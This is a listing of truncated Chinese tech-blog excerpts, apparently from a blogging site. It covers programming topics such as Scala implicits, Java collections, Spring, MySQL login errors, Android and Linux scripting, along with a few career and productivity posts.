直接上代码吧 //second 几秒内下降为0 - (void)reduceVolume:(int)second { KGVoicePlayer *player = [KGVoicePlayer defaultPlayer]; if (!_flag) { _tempVolume = player.volume;
与其怨它不如爱它 bijian1013 选择理想职业规划
抱怨工作是年轻人的常态，但爱工作才是积极的心态，与其怨它不如爱它。一般来说，在公司干了一两年后，不少年轻人容易产生怨言，除了具体的埋怨公司“扭门”，埋怨上司无能以外，也有许多人是因为根本不爱自已的那份工作，工作完全成了谋生的手段，跟自已的性格、专业、爱好都相差甚远。
一边时间不够用一边浪费时间 bingyingao 工作时间浪费
一方面感觉时间严重不够用，另一方面又在不停的浪费时间。每一个周末，晚上熬夜看电影到凌晨一点，早上起不来一直睡到10点钟，10点钟起床，吃饭后玩手机到下午一点。精神还是很差，下午像一直野鬼在城市里晃荡。为何不尝试晚上10点钟就睡，早上7点就起，时间完全是一样的，把看电影的时间换到早上，精神好，气色好，一天好状态。控制让自己周末早睡早起，你就成功了一半。有多少个工作
【Scala八】Scala核心二：隐式转换 bit1129 scala
Implicits work like this: if you call a method on a Scala object, and the Scala compiler does not see a definition for that method in the class definition for that object, the compiler will try to con
sudoku slover in Haskell (2) bookjovi haskell sudoku
继续精简haskell版的sudoku程序，稍微改了一下，这次用了8行，同时性能也提高了很多，对每个空格的所有解不是通过尝试算出来的，而是直接得出。 board = [0,3,4,1,7,0,5,0,0, 0,6,0,0,0,8,3,0,1, 7,0,0,3,0,0,0,0,6, 5,0,0,6,4,0,8,0,7,
Java-Collections Framework学习与总结-HashSet和LinkedHashSet BrokenDreams linkedhashset
本篇总结一下两个常用的集合类HashSet和LinkedHashSet。它们都实现了相同接口java.util.Set。Set表示一种元素无序且不可重复的集合；之前总结过的java.util.List表示一种元素可重复且有序
读《研磨设计模式》-代码笔记-备忘录模式-Memento bylijinnan java 设计模式
声明：本文只为方便我个人查阅和理解，详细的分析以及源代码请移步原作者的博客http://chjavach.iteye.com/ import java.util.ArrayList; import java.util.List; /* * 备忘录模式的功能是，在不破坏封装性的前提下，捕获一个对象的内部状态，并在对象之外保存这个状态，为以后的状态恢复作“备忘”
《RAW格式照片处理专业技法》笔记 cherishLC PS
注意，这不是教程！仅记录楼主之前不太了解的一、色彩（空间）管理作者建议采用ProRGB（色域最广），但camera raw中设为ProRGB，而PS中则在ProRGB的基础上，将gamma值设为了1.8（更符合人眼）注意：bridge、camera raw怎么设置显示、输出的颜色都是正确的（会读取文件内的颜色配置文件），但用PS输出jpg文件时，必须先用Edit->conv
使用 Git 下载 Spring 源码编译 for Eclipse crabdave eclipse
使用 Git 下载 Spring 源码编译 for Eclipse 1、安装gradle，下载 http://www.gradle.org/downloads 配置环境变量GRADLE_HOME，配置PATH %GRADLE_HOME%/bin，cmd，gradle -v 2、spring4 用jdk8 下载 https://jdk8.java.
mysql连接拒绝问题 daizj mysql 登录权限
mysql中在其它机器连接mysql服务器时报错问题汇总一、[running][email protected]:~$mysql -uroot -h 192.168.9.108 -p //带-p参数，在下一步进行密码输入 Enter password: //无字符串输入 ERROR 1045 (28000): Access
Google Chrome 为何打压 H.264 dsjt apple html5 chrome Google
Google 今天在 Chromium 官方博客宣布由于 H.264 编解码器并非开放标准，Chrome 将在几个月后正式停止对 H.264 视频解码的支持，全面采用开放的 WebM 和 Theora 格式。 Google 在博客上表示，自从 WebM 视频编解码器推出以后，在性能、厂商支持以及独立性方面已经取得了很大的进步，为了与 Chromium 现有支持的編解码器保持一致，Chrome
yii 获取控制器名和方法名 dcj3sjt126com yii framework
1. 获取控制器名在控制器中获取控制器名: $name = $this->getId(); 在视图中获取控制器名: $name = Yii::app()->controller->id; 2. 获取动作名在控制器beforeAction()回调函数中获取动作名: $name =
Android知识总结（二） come_for_dream android
明天要考试了，速速总结如下 1、Activity的启动模式 standard：每次调用Activity的时候都创建一个（可以有多个相同的实例，也允许多个相同Activity叠加。） singleTop：可以有多个实例，但是不允许多个相同Activity叠加。即，如果Ac
高洛峰收徒第二期：寻找未来的“技术大牛” ——折腾一年，奖励20万元 gcq511120594 工作项目管理
高洛峰，兄弟连IT教育合伙人、猿代码创始人、PHP培训第一人、《细说PHP》作者、软件开发工程师、《IT峰播》主创人、PHP讲师的鼻祖！首期现在的进程刚刚过半，徒弟们真的很棒，人品都没的说，团结互助，学习刻苦，工作认真积极，灵活上进。我几乎会把他们全部留下来，现在已有一多半安排了实际的工作，并取得了很好的成绩。等他们出徒之日，凭他们的能力一定能够拿到高薪，而且我还承诺过一个徒弟，当他拿到大学毕
linux expect heipark expect
1. 创建、编辑文件go.sh #!/usr/bin/expect spawn sudo su admin expect "*password*" { send "13456\r\n" } interact 2. 设置权限 chmod u+x go.sh 3.
Spring4.1新特性——静态资源处理增强 jinnianshilongnian spring 4.1
目录 Spring4.1新特性——综述 Spring4.1新特性——Spring核心部分及其他 Spring4.1新特性——Spring缓存框架增强 Spring4.1新特性——异步调用和事件机制的异常处理 Spring4.1新特性——数据库集成测试脚本初始化 Spring4.1新特性——Spring MVC增强 Spring4.1新特性——页面自动化测试框架Spring MVC T
idea ubuntuxia 乱码 liyonghui160com
1.首先需要在windows字体目录下或者其它地方找到simsun.ttf 这个字体文件。 2.在ubuntu 下可以执行下面操作安装该字体： sudo mkdir /usr/share/fonts/truetype/simsun sudo cp simsun.ttf /usr/share/fonts/truetype/simsun fc-cache -f -v
改良程序的11技巧 pda158 技巧
有很多理由都能说明为什么我们应该写出清晰、可读性好的程序。最重要的一点，程序你只写一次，但以后会无数次的阅读。当你第二天回头来看你的代码时，你就要开始阅读它了。当你把代码拿给其他人看时，他必须阅读你的代码。因此，在编写时多花一点时间，你会在阅读它时节省大量的时间。让我们看一些基本的编程技巧：尽量保持方法简短永远永远不要把同一个变量用于多个不同的
300个涵盖IT各方面的免费资源（下）——工作与学习篇 shoothao 创业免费资源学习课程远程工作
工作与生产效率: A. 背景声音 Noisli:背景噪音与颜色生成器。 Noizio:环境声均衡器。 Defonic:世界上任何的声响都可混合成美丽的旋律。 Designers.mx:设计者为设计者所准备的播放列表。 Coffitivity:这里的声音就像咖啡馆里放的一样。 B. 避免注意力分散 Self Co
深入浅出RPC uule rpc
深入浅出RPC-浅出篇深入浅出RPC-深入篇 RPC Remote Procedure Call Protocol 远程过程调用协议它是一种通过网络从远程计算机程序上请求服务，而不需要了解底层网络技术的协议。RPC协议假定某些传输协议的存在，如TCP或UDP，为通信程序之间携带信息数据。在OSI网络通信模型中，RPC跨越了传输层和应用层。RPC使得开发